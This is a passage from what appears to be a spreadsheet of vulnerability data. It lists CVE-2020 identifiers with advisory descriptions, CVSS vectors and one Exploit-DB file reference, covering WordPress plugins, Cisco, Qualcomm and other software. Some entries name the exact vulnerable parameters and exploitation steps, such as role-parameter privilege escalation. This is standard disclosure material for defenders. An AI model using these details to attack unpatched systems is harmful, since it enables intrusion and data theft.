    <t>PHP Object injection vulnerabilities in the Post Grid plugin before 2.0.73 for WordPress allow remote authenticated attackers to inject arbitrary PHP objects due to insecure unserialization of data supplied in a remotely hosted crafted payload in the source parameter via AJAX. The action must be set to post_grid_import_xml_layouts.</t>
  </si>
  <si>
    <t>CVE-2020-35939</t>
  </si>
  <si>
    <t>PHP Object injection vulnerabilities in the Team Showcase plugin before 1.22.16 for WordPress allow remote authenticated attackers to inject arbitrary PHP objects due to insecure unserialization of data supplied in a remotely hosted crafted payload in the source parameter via AJAX. The action must be set to team_import_xml_layouts.</t>
  </si>
  <si>
    <t>CVE-2020-3594</t>
  </si>
  <si>
    <t>A vulnerability in Cisco SD-WAN Software could allow an authenticated, local attacker to elevate privileges to root on the underlying operating system. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by providing crafted options to a specific command. A successful exploit could allow the attacker to gain root privileges.</t>
  </si>
  <si>
    <t>exploits/php/webapps/50077.py</t>
  </si>
  <si>
    <t>Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated)</t>
  </si>
  <si>
    <t>2021-07-01</t>
  </si>
  <si>
    <t>CVE-2020-35942</t>
  </si>
  <si>
    <t>A Cross-Site Request Forgery (CSRF) issue in the NextGEN Gallery plugin before 3.5.0 for WordPress allows File Upload and Local File Inclusion via settings modification, leading to Remote Code Execution and XSS. (It is possible to bypass CSRF protection by simply not including a nonce parameter.)</t>
  </si>
  <si>
    <t>CVE-2020-35943</t>
  </si>
  <si>
    <t>A Cross-Site Request Forgery (CSRF) issue in the NextGEN Gallery plugin before 3.5.0 for WordPress allows File Upload. (It is possible to bypass CSRF protection by simply not including a nonce parameter.)</t>
  </si>
  <si>
    <t>CVE-2020-35944</t>
  </si>
  <si>
    <t>An issue was discovered in the PageLayer plugin before 1.1.2 for WordPress. The pagelayer_settings_page function is vulnerable to CSRF, which can lead to XSS.</t>
  </si>
  <si>
    <t>CVE-2020-35945</t>
  </si>
  <si>
    <t>An issue was discovered in the Divi Builder plugin, Divi theme, and Divi Extra theme before 4.5.3 for WordPress. Authenticated attackers, with contributor-level or above capabilities, can upload arbitrary files, including .php files. This occurs because the check for file extensions is on the client side.</t>
  </si>
  <si>
    <t>CVE-2020-35946</t>
  </si>
  <si>
    <t>An issue was discovered in the All in One SEO Pack plugin before 3.6.2 for WordPress. The SEO Description and Title fields are vulnerable to unsanitized input from a Contributor, leading to stored XSS.</t>
  </si>
  <si>
    <t>CVE-2020-35947</t>
  </si>
  <si>
    <t>An issue was discovered in the PageLayer plugin before 1.1.2 for WordPress. Nearly all of the AJAX action endpoints lacked permission checks, allowing these actions to be executed by anyone authenticated on the site. This happened because nonces were used as a means of authorization, but a nonce was present in a publicly viewable page. The greatest impact was the pagelayer_save_content function that allowed pages to be modified and allowed XSS to occur.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L</t>
  </si>
  <si>
    <t>CVE-2020-35948</t>
  </si>
  <si>
    <t>An issue was discovered in the XCloner Backup and Restore plugin before 4.2.13 for WordPress. It gave authenticated attackers the ability to modify arbitrary files, including PHP files. Doing so would allow an attacker to achieve remote code execution. The xcloner_restore.php write_file_action could overwrite wp-config.php, for example. Alternatively, an attacker could create an exploit chain to obtain a database dump.</t>
  </si>
  <si>
    <t>CVE-2020-35949</t>
  </si>
  <si>
    <t>An issue was discovered in the Quiz and Survey Master plugin before 7.0.1 for WordPress. It made it possible for unauthenticated attackers to upload arbitrary files and achieve remote code execution. If a quiz question could be answered by uploading a file, only the Content-Type header was checked during the upload, and thus the attacker could use text/plain for a .php file.</t>
  </si>
  <si>
    <t>CVE-2020-3595</t>
  </si>
  <si>
    <t>A vulnerability in Cisco SD-WAN Software could allow an authenticated, local attacker to elevate privileges to root group on the underlying operating system. The vulnerability is due to incorrect permissions being set when the affected command is executed. An attacker could exploit this vulnerability by executing the affected command on an affected system. A successful exploit could allow the attacker to gain root privileges.</t>
  </si>
  <si>
    <t>CVE-2020-35950</t>
  </si>
  <si>
    <t>An issue was discovered in the XCloner Backup and Restore plugin before 4.2.153 for WordPress. It allows CSRF (via almost any endpoint).</t>
  </si>
  <si>
    <t>CVE-2020-35951</t>
  </si>
  <si>
    <t>An issue was discovered in the Quiz and Survey Master plugin before 7.0.1 for WordPress. It allows users to delete arbitrary files such as wp-config.php file, which could effectively take a site offline and allow an attacker to reinstall with a WordPress instance under their control. This occurred via qsm_remove_file_fd_question, which allowed unauthenticated deletions (even though it was only intended for a person to delete their own quiz-answer files).</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H</t>
  </si>
  <si>
    <t>CVE-2020-35952</t>
  </si>
  <si>
    <t>login.php in PHPFusion (aka PHP-Fusion) Andromeda 9.x before 2020-12-30 generates error messages that distinguish between incorrect username and incorrect password (i.e., not a single "Incorrect username or password" message in both cases), which might allow enumeration.</t>
  </si>
  <si>
    <t>CVE-2020-3596</t>
  </si>
  <si>
    <t>A vulnerability in the Session Initiation Protocol (SIP) of Cisco Expressway Series and Cisco TelePresence Video Communication Server (VCS) could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to incorrect handling of incoming SIP traffic. An attacker could exploit this vulnerability by sending a series of SIP packets to an affected device. A successful exploit could allow the attacker to exhaust memory on an affected device, causing it to crash and leading to a DoS condition.</t>
  </si>
  <si>
    <t>CVE-2020-35962</t>
  </si>
  <si>
    <t>The sellTokenForLRC function in the vault protocol in the smart contract implementation for Loopring (LRC), an Ethereum token, lacks access control for fee swapping and thus allows price manipulation.</t>
  </si>
  <si>
    <t>CVE-2020-35963</t>
  </si>
  <si>
    <t>flb_gzip_compress in flb_gzip.c in Fluent Bit before 1.6.4 has an out-of-bounds write because it does not use the correct calculation of the maximum gzip data-size expansion.</t>
  </si>
  <si>
    <t>CVE-2020-35964</t>
  </si>
  <si>
    <t>track_header in libavformat/vividas.c in FFmpeg 4.3.1 has an out-of-bounds write because of incorrect extradata packing.</t>
  </si>
  <si>
    <t>CVE-2020-35965</t>
  </si>
  <si>
    <t>decode_frame in libavcodec/exr.c in FFmpeg 4.3.1 has an out-of-bounds write because of errors in calculations of when to perform memset zero operations.</t>
  </si>
  <si>
    <t>CVE-2020-3597</t>
  </si>
  <si>
    <t>A vulnerability in the configuration restore feature of Cisco Nexus Data Broker software could allow an unauthenticated, remote attacker to perform a directory traversal attack on an affected device. The vulnerability is due to insufficient validation of configuration backup files. An attacker could exploit this vulnerability by persuading an administrator to restore a crafted configuration backup file. A successful exploit could allow the attacker to overwrite arbitrary files that are accessible through the affected software on an affected device.</t>
  </si>
  <si>
    <t>CVE-2020-35970</t>
  </si>
  <si>
    <t>An issue was discovered in YzmCMS 5.8. There is a SSRF vulnerability in the background collection management that allows arbitrary file read.</t>
  </si>
  <si>
    <t>CVE-2020-35971</t>
  </si>
  <si>
    <t>A storage XSS vulnerability is found in YzmCMS v5.8, which can be used by attackers to inject JS code and attack malicious XSS on the /admin/system_manage/user_config_edit.html page.</t>
  </si>
  <si>
    <t>CVE-2020-35972</t>
  </si>
  <si>
    <t>An issue was discovered in YzmCMS V5.8. There is a CSRF vulnerability that can add member user accounts via member/member/add.html.</t>
  </si>
  <si>
    <t>CVE-2020-35973</t>
  </si>
  <si>
    <t>An issue was discovered in zzcms2020. There is a XSS vulnerability that can insert and execute JS code arbitrarily via /user/manage.php.</t>
  </si>
  <si>
    <t>CVE-2020-35979</t>
  </si>
  <si>
    <t>An issue was discovered in GPAC version 0.8.0 and 1.0.1. There is heap-based buffer overflow in the function gp_rtp_builder_do_avc() in ietf/rtp_pck_mpeg4.c.</t>
  </si>
  <si>
    <t>CVE-2020-3598</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Vision Dynamic Signage Director could allow an unauthenticated, remote attacker to access confidential information or make configuration changes. The vulnerability is due to missing authentication for a specific section of the web-based management interface. An attacker could exploit this vulnerability by accessing a crafted URL. A successful exploit could allow the attacker to obtain access to a section of the interface, which they could use to read confidential information or make configuration changes.</t>
  </si>
  <si>
    <t>CVE-2020-35980</t>
  </si>
  <si>
    <t>An issue was discovered in GPAC version 0.8.0 and 1.0.1. There is a use-after-free in the function gf_isom_box_del() in isomedia/box_funcs.c.</t>
  </si>
  <si>
    <t>CVE-2020-35981</t>
  </si>
  <si>
    <t>An issue was discovered in GPAC version 0.8.0 and 1.0.1. There is an invalid pointer dereference in the function SetupWriters() in isomedia/isom_store.c.</t>
  </si>
  <si>
    <t>CVE-2020-35982</t>
  </si>
  <si>
    <t>An issue was discovered in GPAC version 0.8.0 and 1.0.1. There is an invalid pointer dereference in the function gf_hinter_track_finalize() in media_tools/isom_hinter.c.</t>
  </si>
  <si>
    <t>CVE-2020-35984</t>
  </si>
  <si>
    <t>A stored cross site scripting (XSS) vulnerability in the 'Users Alerts' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Title' parameter.</t>
  </si>
  <si>
    <t>CVE-2020-35985</t>
  </si>
  <si>
    <t>A stored cross site scripting (XSS) vulnerability in the 'Global Lists" feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter.</t>
  </si>
  <si>
    <t>CVE-2020-35986</t>
  </si>
  <si>
    <t>A stored cross site scripting (XSS) vulnerability in the 'Users Access Groups' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter.</t>
  </si>
  <si>
    <t>CVE-2020-35987</t>
  </si>
  <si>
    <t>A stored cross site scripting (XSS) vulnerability in the 'Entities List' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter.</t>
  </si>
  <si>
    <t>CVE-2020-3599</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Adaptive Security Appliance (ASA) Software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information.</t>
  </si>
  <si>
    <t>CVE-2020-35992</t>
  </si>
  <si>
    <t>Fiserv Prologue through 2020-12-16 does not properly protect the database password. If an attacker were to gain access to the configuration file (specifically, the LogPassword attribute within appconfig.ini), they would be able to decrypt the password stored within the configuration file. This would yield cleartext credentials for the database (to gain access to financial records of customers stored within the database), and in some cases would allow remote login to the database.</t>
  </si>
  <si>
    <t>CVE-2020-3600</t>
  </si>
  <si>
    <t>A vulnerability in Cisco SD-WAN Software could allow an authenticated, local attacker to elevate privileges to root on the underlying operating system. The vulnerability is due to insufficient security controls on the CLI. An attacker could exploit this vulnerability by using an affected CLI utility that is running on an affected system. A successful exploit could allow the attacker to gain root privileges.</t>
  </si>
  <si>
    <t>CVE-2020-36002</t>
  </si>
  <si>
    <t>Seat-Reservation-System 1.0 has a SQL injection vulnerability in index.php in the id parameter where attackers can obtain sensitive database information.</t>
  </si>
  <si>
    <t>CVE-2020-36003</t>
  </si>
  <si>
    <t>The id parameter in detail.php of Online Book Store v1.0 is vulnerable to union-based blind SQL injection, which leads to the ability to retrieve all databases.</t>
  </si>
  <si>
    <t>CVE-2020-36004</t>
  </si>
  <si>
    <t>AppCMS 2.0.101 in /admin/download_frame.php has a SQL injection vulnerability which allows attackers to obtain sensitive database information.</t>
  </si>
  <si>
    <t>CVE-2020-36005</t>
  </si>
  <si>
    <t>AppCMS 2.0.101 in /admin/app.php has an arbitrary file deletion vulnerability which allows attackers to delete arbitrary files on the site.</t>
  </si>
  <si>
    <t>CVE-2020-36006</t>
  </si>
  <si>
    <t>AppCMS 2.0.101 in /admin/info.php has an arbitrary file deletion vulnerability which allows attackers to delete arbitrary files on the site.</t>
  </si>
  <si>
    <t>CVE-2020-36007</t>
  </si>
  <si>
    <t>AppCMS 2.0.101 in /admin/template/tpl_app.php has a cross site scripting attack vulnerability which allows the attacker to obtain sensitive information of other users.</t>
  </si>
  <si>
    <t>CVE-2020-36008</t>
  </si>
  <si>
    <t>OBottle 2.0 in \c\t.php contains an arbitrary file write vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-36009</t>
  </si>
  <si>
    <t>OBottle 2.0 in \c\g.php contains an arbitrary file download vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-3601</t>
  </si>
  <si>
    <t>A vulnerability in the CLI of Cisco StarOS operating system for Cisco ASR 5000 Series Routers could allow an authenticated, local attacker to elevate privileges on an affected device. The vulnerability is due to insufficient input validation of CLI commands. An attacker could exploit this vulnerability by sending crafted commands to the CLI. A successful exploit could allow the attacker to execute arbitrary code with the privileges of the root user. To exploit this vulnerability, an attacker would need to have valid administrative credentials on an affected device.</t>
  </si>
  <si>
    <t>CVE-2020-36011</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) issue in Add Patient Form in QDOCS Smart Hospital Management System 3.1 allows a remote attacker to inject arbitrary code via the Name, Guardian Name, Email, Address, Remarks, or Any Known Allergies field.</t>
  </si>
  <si>
    <t>CVE-2020-36012</t>
  </si>
  <si>
    <t>Stored XSS vulnerability in BDTASK Multi-Store Inventory Management System 1.0 allows a local admin to inject arbitrary code via the Customer Name Field.</t>
  </si>
  <si>
    <t>CVE-2020-3602</t>
  </si>
  <si>
    <t>A vulnerability in the CLI of Cisco StarOS operating system for Cisco ASR 5000 Series Routers could allow an authenticated, local attacker to elevate privileges on an affected device. The vulnerability is due to insufficient input validation of CLI commands. An attacker could exploit this vulnerability by sending crafted commands to the CLI. A successful exploit could allow the attacker to execute arbitrary code with the privileges of the root user on the affected device. To exploit this vulnerability, an attacker would need to have valid credentials on an affected device and know the password for the cli test-commands command.</t>
  </si>
  <si>
    <t>CVE-2020-3603</t>
  </si>
  <si>
    <t>CVE-2020-36033</t>
  </si>
  <si>
    <t>SQL injection vulnerability in SourceCodester Water Billing System 1.0 via the id parameter to edituser.php.</t>
  </si>
  <si>
    <t>CVE-2020-3604</t>
  </si>
  <si>
    <t>CVE-2020-36048</t>
  </si>
  <si>
    <t>Engine.IO before 4.0.0 allows attackers to cause a denial of service (resource consumption) via a POST request to the long polling transport.</t>
  </si>
  <si>
    <t>CVE-2020-36049</t>
  </si>
  <si>
    <t>socket.io-parser before 3.4.1 allows attackers to cause a denial of service (memory consumption) via a large packet because a concatenation approach is used.</t>
  </si>
  <si>
    <t>CVE-2020-36051</t>
  </si>
  <si>
    <t>Directory traversal vulnerability in page_edit.php in MiniCMS V1.10 allows remote attackers to read arbitrary files via the state parameter.</t>
  </si>
  <si>
    <t>CVE-2020-36052</t>
  </si>
  <si>
    <t>Directory traversal vulnerability in post-edit.php in MiniCMS V1.10 allows remote attackers to include and execute arbitrary files via the state parameter.</t>
  </si>
  <si>
    <t>CVE-2020-36056</t>
  </si>
  <si>
    <t>Beetel 777VR1-DI Hardware Version REV.1.01 Firmware Version V01.00.09_55 was discovered to contain a cross-site scripting (XSS) vulnerability via the Ping diagnostic option.</t>
  </si>
  <si>
    <t>CVE-2020-36062</t>
  </si>
  <si>
    <t>Dairy Farm Shop Management System v1.0 was discovered to contain hardcoded credentials in the source code which allows attackers access to the control panel if compromised.</t>
  </si>
  <si>
    <t>CVE-2020-36064</t>
  </si>
  <si>
    <t>Online Course Registration v1.0 was discovered to contain hardcoded credentials in the source code which allows attackers access to the control panel if compromised.</t>
  </si>
  <si>
    <t>CVE-2020-36066</t>
  </si>
  <si>
    <t>GJSON &lt;1.6.5 allows attackers to cause a denial of service (remote) via crafted JSON.</t>
  </si>
  <si>
    <t>CVE-2020-36067</t>
  </si>
  <si>
    <t>GJSON &lt;=v1.6.5 allows attackers to cause a denial of service (panic: runtime error: slice bounds out of range) via a crafted GET call.</t>
  </si>
  <si>
    <t>CVE-2020-36079</t>
  </si>
  <si>
    <t>** DISPUTED ** Zenphoto through 1.5.7 is affected by authenticated arbitrary file upload, leading to remote code execution. The attacker must navigate to the uploader plugin, check the elFinder box, and then drag and drop files into the Files(elFinder) portion of the UI. This can, for example, place a .php file in the server's uploaded/ directory. NOTE: the vendor disputes this because exploitation can only be performed by an admin who has "lots of other possibilities to harm a site."</t>
  </si>
  <si>
    <t>CVE-2020-3610</t>
  </si>
  <si>
    <t>Possibility of double free of the drawobj that is added to the drawqueue array of the context during IOCTL commands as there is no refcount taken for this object in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables in APQ8009, APQ8053, APQ8096AU, APQ8098, MSM8909W, MSM8917, MSM8953, MSM8996AU, Nicobar, QCS405, QCS605, QM215, Rennell, SA415M, Saipan, SC8180X, SDA660, SDA845, SDM429, SDM429W, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM670, SDM710, SDM845, SDX20, SDX24, SDX55, SM6150, SM7150, SM8150, SM8250, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-36109</t>
  </si>
  <si>
    <t>ASUS RT-AX86U router firmware below version under 9.0.0.4_386 has a buffer overflow in the blocking_request.cgi function of the httpd module that can cause code execution when an attacker constructs malicious data.</t>
  </si>
  <si>
    <t>CVE-2020-3611</t>
  </si>
  <si>
    <t>u'XBL SEC clears only ZI region when loading Qualcomm-signed segments can lead to improper access issue' in Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wired Infrastructure and Networking in APQ8098, Kamorta, MSM8998, QCS404, QCS605, SDA660, SDA845, SDM630, SDM636, SDM660, SDM670, SDM710, SDM845, SDM850, SXR1130</t>
  </si>
  <si>
    <t>CVE-2020-36112</t>
  </si>
  <si>
    <t>CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php and in cart.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database on which the web application is running.</t>
  </si>
  <si>
    <t>CVE-2020-36115</t>
  </si>
  <si>
    <t>Stored Cross Site Scripting (XSS) vulnerability in EGavilan Media CRUD Operation with PHP, MySQL, Bootstrap, and Dompdf via First Name or Last Name parameter in the 'Add New Record Feature'.</t>
  </si>
  <si>
    <t>CVE-2020-36120</t>
  </si>
  <si>
    <t>Buffer Overflow in the "sixel_encoder_encode_bytes" function of Libsixel v1.8.6 allows attackers to cause a Denial of Service (DoS).</t>
  </si>
  <si>
    <t>CVE-2020-36123</t>
  </si>
  <si>
    <t>saitoha libsixel v1.8.6 was discovered to contain a double free via the component sixel_chunk_destroy at /root/libsixel/src/chunk.c.</t>
  </si>
  <si>
    <t>CVE-2020-36124</t>
  </si>
  <si>
    <t>Pax Technology PAXSTORE v7.0.8_20200511171508 and lower is affected by XML External Entity (XXE) injection. An authenticated attacker can compromise the private keys of a JWT token and reuse them to manipulate the access tokens to access the platform as any desired user (clients and administrators).</t>
  </si>
  <si>
    <t>CVE-2020-36125</t>
  </si>
  <si>
    <t>Pax Technology PAXSTORE v7.0.8_20200511171508 and lower is affected by incorrect access control where password revalidation in sensitive operations can be bypassed remotely by an authenticated attacker through requesting the endpoint directly.</t>
  </si>
  <si>
    <t>CVE-2020-36126</t>
  </si>
  <si>
    <t>Pax Technology PAXSTORE v7.0.8_20200511171508 and lower is affected by incorrect access control that can lead to remote privilege escalation. PAXSTORE marketplace endpoints allow an authenticated user to read and write data not owned by them, including third-party users, application and payment terminals, where an attacker can impersonate any user which may lead to the unauthorized disclosure, modification, or destruction of information.</t>
  </si>
  <si>
    <t>CVE-2020-36127</t>
  </si>
  <si>
    <t>Pax Technology PAXSTORE v7.0.8_20200511171508 and lower is affected by an information disclosure vulnerability. Through the PUK signature functionality, an administrator will not have access to the current p12 certificate and password. When accessing this functionality, the administrator has the option to replace the current certificate and it is not possible to view the certificate password (p12) already deployed on the platform. The replacement p12 certificate returns to users in base64 with its password, which can be accessed by non-administrator users.</t>
  </si>
  <si>
    <t>CVE-2020-36128</t>
  </si>
  <si>
    <t>Pax Technology PAXSTORE v7.0.8_20200511171508 and lower is affected by a token spoofing vulnerability. Each payment terminal has a session token (called X-Terminal-Token) to access the marketplace. This allows the store to identify the terminal and make available the applications distributed by its reseller. By intercepting HTTPS traffic from the application store, it is possible to collect the request responsible for assigning the X-Terminal-Token to the terminal, which makes it possible to craft an X-Terminal-Token pretending to be another device. An attacker can use this behavior to authenticate its own payment terminal in the application store through token impersonation.</t>
  </si>
  <si>
    <t>CVE-2020-36129</t>
  </si>
  <si>
    <t>AOM v2.0.1 was discovered to contain a stack buffer overflow via the component src/aom_image.c.</t>
  </si>
  <si>
    <t>CVE-2020-3613</t>
  </si>
  <si>
    <t>Double free issue in kernel memory mapping due to lack of memory protection mechanism in Snapdragon Compute, Snapdragon Mobile, Snapdragon Voice &amp; Music in SM8150</t>
  </si>
  <si>
    <t>CVE-2020-36130</t>
  </si>
  <si>
    <t>AOM v2.0.1 was discovered to contain a NULL pointer dereference via the component av1/av1_dx_iface.c.</t>
  </si>
  <si>
    <t>CVE-2020-36131</t>
  </si>
  <si>
    <t>AOM v2.0.1 was discovered to contain a stack buffer overflow via the component stats/rate_hist.c.</t>
  </si>
  <si>
    <t>CVE-2020-36133</t>
  </si>
  <si>
    <t>AOM v2.0.1 was discovered to contain a global buffer overflow via the component av1/encoder/partition_search.h.</t>
  </si>
  <si>
    <t>CVE-2020-36134</t>
  </si>
  <si>
    <t>AOM v2.0.1 was discovered to contain a segmentation violation via the component aom_dsp/x86/obmc_sad_avx2.c.</t>
  </si>
  <si>
    <t>CVE-2020-36135</t>
  </si>
  <si>
    <t>AOM v2.0.1 was discovered to contain a NULL pointer dereference via the component rate_hist.c.</t>
  </si>
  <si>
    <t>CVE-2020-36139</t>
  </si>
  <si>
    <t>BloofoxCMS 0.5.2.1 allows Reflected Cross-Site Scripting (XSS) vulnerability by inserting a XSS payload within the 'fileurl' parameter.</t>
  </si>
  <si>
    <t>CVE-2020-3614</t>
  </si>
  <si>
    <t>Possible buffer overflow while copying the frame to local buffer due to lack of check of length before copying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APQ8009, APQ8017, APQ8053, APQ8076, APQ8096, APQ8096AU, APQ8098, IPQ6018, IPQ8074, MDM9206, MDM9207C, MDM9607, MDM9640, MDM9650, MSM8905, MSM8909, MSM8909W, MSM8917, MSM8920, MSM8937, MSM8940, MSM8953, MSM8996AU, MSM8998, Nicobar, QCA6174A, QCA6574AU, QCA6584AU, QCA9377, QCA9379, QCA9886, QCM2150, QCS405, QCS605, QM215, Rennell, SC7180, SC8180X, SDM429, SDM429W, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM670, SDM710, SDM845, SDX20, SDX24, SM6150, SM7150, SM8150, SXR1130</t>
  </si>
  <si>
    <t>CVE-2020-36140</t>
  </si>
  <si>
    <t>BloofoxCMS 0.5.2.1 allows Cross-Site Request Forgery (CSRF) via 'mode=settings&amp;page=editor', as demonstrated by use of 'mode=settings&amp;page=editor' to change any file content (Locally/Remotely).</t>
  </si>
  <si>
    <t>CVE-2020-36141</t>
  </si>
  <si>
    <t>BloofoxCMS 0.5.2.1 allows Unrestricted File Upload vulnerability via bypass MIME Type validation by inserting 'image/jpeg' within the 'Content-Type' header.</t>
  </si>
  <si>
    <t>CVE-2020-36142</t>
  </si>
  <si>
    <t>BloofoxCMS 0.5.2.1 allows Directory traversal vulnerability by inserting '../' payloads within the 'fileurl' parameter.</t>
  </si>
  <si>
    <t>CVE-2020-36144</t>
  </si>
  <si>
    <t>Redash 8.0.0 is affected by LDAP Injection. There is an information leak through the crafting of special queries, escaping the provided template since the username included in the search filter lacks sanitization.</t>
  </si>
  <si>
    <t>CVE-2020-36148</t>
  </si>
  <si>
    <t>Incorrect handling of input data in verifyAttribute function in the libmysofa library 0.5 - 1.1 will lead to NULL pointer dereference and segmentation fault error in case of restrictive memory protection or near NULL pointer overwrite in case of no memory restrictions (e.g. in embedded environments).</t>
  </si>
  <si>
    <t>CVE-2020-36149</t>
  </si>
  <si>
    <t>Incorrect handling of input data in changeAttribute function in the libmysofa library 0.5 - 1.1 will lead to NULL pointer dereference and segmentation fault error in case of restrictive memory protection or near NULL pointer overwrite in case of no memory restrictions (e.g. in embedded environments).</t>
  </si>
  <si>
    <t>CVE-2020-3615</t>
  </si>
  <si>
    <t>Valid deauth/disassoc frames is dropped in case if RMF is enabled and some rouge peer keep on sending rogue deauth/disassoc frames due to improper enum values used to check the frame subtype in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile in APQ8009, APQ8053, APQ8096AU, MDM9150, MDM9206, MDM9207C, MDM9607, MDM9650, MSM8996AU, QCA6174A, QCA6574AU, QCA9377, QCA9379, QCN7605, QCS605, SC8180X, SDM630, SDM636, SDM660, SDM845, SDX20, SDX24, SDX55, SM8150, SXR1130</t>
  </si>
  <si>
    <t>CVE-2020-36150</t>
  </si>
  <si>
    <t>Incorrect handling of input data in loudness function in the libmysofa library 0.5 - 1.1 will lead to heap buffer overflow and access to unallocated memory block.</t>
  </si>
  <si>
    <t>CVE-2020-36151</t>
  </si>
  <si>
    <t>Incorrect handling of input data in mysofa_resampler_reset_mem function in the libmysofa library 0.5 - 1.1 will lead to heap buffer overflow and overwriting large memory block.</t>
  </si>
  <si>
    <t>CVE-2020-36152</t>
  </si>
  <si>
    <t>Buffer overflow in readDataVar in hdf/dataobject.c in Symonics libmysofa 0.5 - 1.1 allows attackers to execute arbitrary code via a crafted SOFA.</t>
  </si>
  <si>
    <t>CVE-2020-36154</t>
  </si>
  <si>
    <t>The Application Wrapper in Pearson VUE VTS Installer 2.3.1911 has Full Control permissions for Everyone in the "%SYSTEMDRIVE%\Pearson VUE" directory, which allows local users to obtain administrative privileges via a Trojan horse application.</t>
  </si>
  <si>
    <t>CVE-2020-36155</t>
  </si>
  <si>
    <t>An issue was discovered in the Ultimate Member plugin before 2.1.12 for WordPress, aka Unauthenticated Privilege Escalation via User Meta. An attacker could supply an array parameter for sensitive metadata, such as the wp_capabilities user meta that defines a user's role. During the registration process, submitted registration details were passed to the update_profile function, and any metadata was accepted, e.g., wp_capabilities[administrator] for Administrator access.</t>
  </si>
  <si>
    <t>CVE-2020-36156</t>
  </si>
  <si>
    <t>An issue was discovered in the Ultimate Member plugin before 2.1.12 for WordPress, aka Authenticated Privilege Escalation via Profile Update. Any user with wp-admin access to the profile.php page could supply the parameter um-role with a value set to any role (e.g., Administrator) during a profile update, and effectively escalate their privileges.</t>
  </si>
  <si>
    <t>CVE-2020-36157</t>
  </si>
  <si>
    <t>An issue was discovered in the Ultimate Member plugin before 2.1.12 for WordPress, aka Unauthenticated Privilege Escalation via User Roles. Due to the lack of filtering on the role parameter that could be supplied during the registration process, an attacker could supply the role parameter with a WordPress capability (or any custom Ultimate Member role) and effectively be granted those privileges.</t>
  </si>
  <si>
    <t>CVE-2020-36158</t>
  </si>
  <si>
    <t>mwifiex_cmd_802_11_ad_hoc_start in drivers/net/wireless/marvell/mwifiex/join.c in the Linux kernel through 5.10.4 might allow remote attackers to execute arbitrary code via a long SSID value, aka CID-5c455c5ab332.</t>
  </si>
  <si>
    <t>CVE-2020-36159</t>
  </si>
  <si>
    <t>Veritas Desktop and Laptop Option (DLO) before 9.5 disclosed operational information on the backup processing status through a URL that did not require authentication.</t>
  </si>
  <si>
    <t>CVE-2020-3616</t>
  </si>
  <si>
    <t>Buffer overflow in display function due to memory copy without checking length of size using strcpy function in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables in APQ8017, APQ8053, APQ8096AU, APQ8098, MDM9206, MDM9207C, MDM9607, MSM8909W, MSM8917, MSM8953, MSM8996AU, QCS605, QM215, SDA660, SDA845, SDM429, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM845, SDX20, SM6150, SM7150, SM8150</t>
  </si>
  <si>
    <t>CVE-2020-36160</t>
  </si>
  <si>
    <t>An issue was discovered in Veritas System Recovery before 21.2. On start-up, it loads the OpenSSL library from \usr\local\ssl. This library attempts to load the from \usr\local\ssl\openssl.cnf configuration file, which does not exist. By default, on Windows systems, users can create directories under C:\. A low privileged user can create a C:\usr\local\ssl\openssl.cnf configuration file to load a malicious OpenSSL engine, resulting in arbitrary code execution as SYSTEM when the service starts. This gives the attacker administrator access on the system, allowing the attacker (by default) to access all data and installed applications, etc. If the system is also an Active Directory domain controller, then this can affect the entire domain.</t>
  </si>
  <si>
    <t>CVE-2020-36161</t>
  </si>
  <si>
    <t>An issue was discovered in Veritas APTARE 10.4 before 10.4P9 and 10.5 before 10.5P3. By default, on Windows systems, users can create directories under C:\. A low privileged user can create a directory at the configuration file locations. When the Windows system restarts, a malicious OpenSSL engine could exploit arbitrary code execution as SYSTEM. This gives the attacker administrator access on the system, allowing the attacker (by default) to access all data, access all installed applications, etc.</t>
  </si>
  <si>
    <t>CVE-2020-36162</t>
  </si>
  <si>
